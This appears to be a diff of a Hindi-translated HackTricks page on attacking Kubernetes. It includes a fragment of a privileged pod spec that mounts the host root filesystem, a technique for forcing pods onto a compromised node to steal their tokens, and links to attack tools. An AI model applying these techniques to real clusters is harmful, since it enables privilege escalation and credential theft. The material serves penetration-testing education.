+**उदाहरण**: kube-system में privilege pod बनाने के लिए **pod** configuration, [**यहाँ**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) से लिया गया:
 ```yaml
 apiVersion: v1
 kind: Pod
@@ -284,12 +326,12 @@ hostPath:
 path: /
 type: Directory
 ```
-### Pods और अस्थायी नोड्स को हटाना
+### Delete pods + unschedulable nodes
 
-यदि एक हमलावर ने **एक नोड को समझौता** कर लिया है और वह अन्य नोड्स से **पॉड्स को हटा सकता है** और **अन्य नोड्स को पॉड्स निष्पादित करने में असमर्थ बना सकता है**, तो पॉड्स समझौता किए गए नोड में फिर से चलाए जाएंगे और वह उनमें चल रहे **टोकन को चुरा** सकेगा।\
-[**अधिक जानकारी के लिए इस लिंक का पालन करें**](abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods-+-unschedulable-nodes).
+यदि कोई हमलावर ने **compromised a node** कर लिया है और वह अन्य नोड्स से **delete pods** कर सकता है और अन्य नोड्स को **make other nodes not able to execute pods** बना सकता है, तो वे pods compromised node में पुनः चलाए जाएंगे और वह उनमें चल रहे टोकन को **steal the tokens** कर सकेगा.\
+For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods-+-unschedulable-nodes).
 
-## स्वचालित उपकरण
+## स्वचालित टूल्स
 
 - [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
 ```
@@ -353,4 +395,13 @@ Off-Menu         +
 ```
 - [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
 
+## संदर्भ
+
+- [Forgotten (HTB) - Writable bind mount SUID planting](https://0xdf.gitlab.io/2025/09/16/htb-forgotten.html)
+- [Kubernetes hostPath volume](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
+- [Docker bind mounts](https://docs.docker.com/storage/bind-mounts/)
+- [Bash -p (preserve privileges)](https://www.gnu.org/software/bash/manual/bash.html#Invoking-Bash)
+- [mount(8) nosuid option](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [Peirates (Kubernetes attack tool)](https://github.com/inguardians/peirates)
+
 {{#include ../../banners/hacktricks-training.md}}